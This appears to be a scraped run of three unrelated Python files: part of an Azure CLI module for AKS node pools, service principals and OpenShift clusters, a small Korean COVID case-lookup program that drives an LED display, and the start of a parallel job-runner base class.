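    # expected shape: /subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/...
    # so split('/') puts the subscription id at index 2 and the resource group at index 4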
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
tags=None,
labels=None,
mode="User",
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
node_vm_size = "Standard_D2s_v3"
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
mode=mode
)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
    # Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
    # The get() call errors out if the group doesn't exist; its result carries the location we return.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
            raise CLIError('min-count and max-count are only valid together with --enable-cluster-autoscaler, '
                           'please specify that flag as well')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None,
management_subnet_cidr=None,
private_cluster=None):
if vnet_peer is not None:
        raise CLIError('Vnet peering is no longer supported during cluster creation. '
                       'Instead, vnet properties can be edited after cluster creation.')
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
if bool(private_cluster) != bool(management_subnet_cidr is not None):
raise CLIError('Both --private-cluster and --management-subnet-cidr need to be supplied or neither.')
api_properties = OpenShiftAPIProperties(
private_api_server=bool(private_cluster)
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterMasterPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix,
api_properties=api_properties
)
identity_providers = []
create_aad = False
    # Validate that the cluster does not already exist, since AAD rotation is not supported on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
        # Check whether aad_client_app_id, aad_client_app_secret and aad_tenant_id were provided;
        # if none were, create the AAD application
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(vnet_cidr=vnet_prefix, management_subnet_cidr=management_subnet_cidr)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_update(cmd, client, resource_group_name, name, refresh_cluster=None, no_wait=False):
instance = client.get(resource_group_name, name)
if refresh_cluster:
instance.refresh_cluster = True
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
|
main.py
|
import json
import crawlKoreaData_All as crawl1
import crawlKoreaData_Gyeonggi as crawl2
import crawlKoreaData_Seoul as crawl3
import LED_Display as LMD
import threading
from datetime import date, timedelta
today = date.today()
a = str(today)
def LED_init():
    thread = threading.Thread(target=LMD.main, args=())
    thread.daemon = True
thread.start()
return
crawl1.run()
crawl2.run()
crawl3.run()
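# 16 x 32 buffer matching the LED matrix resolution; cells set to 1 are pushed to the
# display by search_count() via LMD.set_pixel()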
array_screen = [
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
# Look up the confirmed-case count for a given region
def search_count(js_file,search_region,array):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
print(json_data[i]['확진자수'])
array[1][1] = 1
for x in range(16):
for y in range(32):
if array[x][y] == 1:
LMD.set_pixel(x,y,0)
# Look up the day-over-day change in confirmed cases for a given region
def count_change(js_file,search_region):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
return json_data[i]['전날비교']
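# A minimal sketch of the record layout the two lookups above assume (the values are
# hypothetical; the keys are taken from the accesses in search_count/count_change):
_SAMPLE_REGION_RECORD = {
    "지역이름": "종로구",  # region name
    "확진자수": "12",      # confirmed-case count
    "전날비교": "1",       # change versus the previous day
}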
menu = 1
while(menu):
print("*****Menu*****")
print("1.All")
print("2.Seoul")
print("3.Gyeonggi")
print("4.Exit")
print("**************")
menu_choice = int(input("Select menu: "))
    # each sub-menu loops until the user enters 0 to go back
    while menu_choice == 1:  # nationwide confirmed-case lookup
        js_file = "koreaRegionalData.js"
        search_region = input("Enter a region (e.g. 서울): ")
        search_count(js_file, search_region, array_screen)
        if search_region == '0':  # entering 0 returns to the menu
            break
    while menu_choice == 2:  # Seoul district-level lookup
        js_file = 'koreaData_Seoul_' + a + '.js'
        search_region = input("Enter a district (e.g. 종로구): ")
        search_count(js_file, search_region, array_screen)
        if search_region == '0':  # entering 0 returns to the menu
            break
    while menu_choice == 3:  # Gyeonggi district-level lookup
        js_file = "koreaData_Gyeonggi.js"
        search_region = input("Enter a district (e.g. 수원): ")
        search_count(js_file, search_region, array_screen)
        print(str(count_change(js_file, search_region)), "case(s) more than the previous day")
        if search_region == '0':  # entering 0 returns to the menu
            break
    if menu_choice == 4:  # exit the menu
menu = 0
|
parallel_proc_runner_base.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# https://github.com/cquickstad/parallel_proc_runner
# Copyright 2018 Chad Quickstad
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import sys
import os
import re
import uuid
import optparse
import webbrowser
import tkinter as tk
import tkinter.ttk as ttk
from tempfile import gettempdir
from enum import Enum
from time import sleep
from random import randint
class BaseJobRunner:
"""This base class that allows easy implementation of an application that can run parallel processes
with a choice between a GUI or command-line interface"""
def __init__(self, name):
self.name = name
# This object does not inherit from threading.Thread. Instead it uses threading.Thread as a member to run this
# object's run() method. This is because this object supports running multiple times, but threading.Thread can
# only run once. The member thread is created every time start() is called.
self.thread = None
self.start_gating_event = None
self.start_callback = self.dummy_method
self.stop_callback = self.dummy_method
self.stop_event = threading.Event()
# For polling instead of using callbacks
self.running = False
self.result = -1
self.output = ""
self.result_message = ""
self.setup_kwargs = dict()
def dummy_method(self, *args, **kwargs):
pass
def set_start_gating_event(self, start_gating_event):
self.start_gating_event = start_gating_event
def set_start_callback(self, start_callback):
self.start_callback = start_callback
def set_stop_callback(self, stop_callback):
self.stop_callback = stop_callback
def set_args(self, **kwargs):
self.setup_kwargs = kwargs
def start(self):
self.result = -1
self.output = ""
self.result_message = ""
if self.stop_event.is_set():
self.stop_event.clear()
self.thread = threading.Thread(name=self.name, target=self.run)
self.thread.start()
def run(self):
"""When start() is called, this run() method will be called in a new thread"""
self.running = False
if self.start_gating_event is not None:
self.start_gating_event.wait()
self.running = True
if self.start_callback is not None:
self.start_callback(self.name)
try:
self.result, self.output = self.job()
self.result_message = "Success" if self.result == 0 else "FAIL (" + str(self.result) + ")"
except Exception as e:
# Catch all exceptions in the child thread. This isn't generally a good idea, but we want exceptions to be
# reported to the parent thread.
self.result_message = "FAIL (Exception)"
self.output += "\n" + type(e).__name__ + ": " + str(e)
finally:
self.running = False
if self.stop_callback is not None:
self.stop_callback(self.name, self.result_message, self.output)
self.stop_event.set()
def job(self):
"""Child type should implement job() to do the task this runner is trying to accomplish.
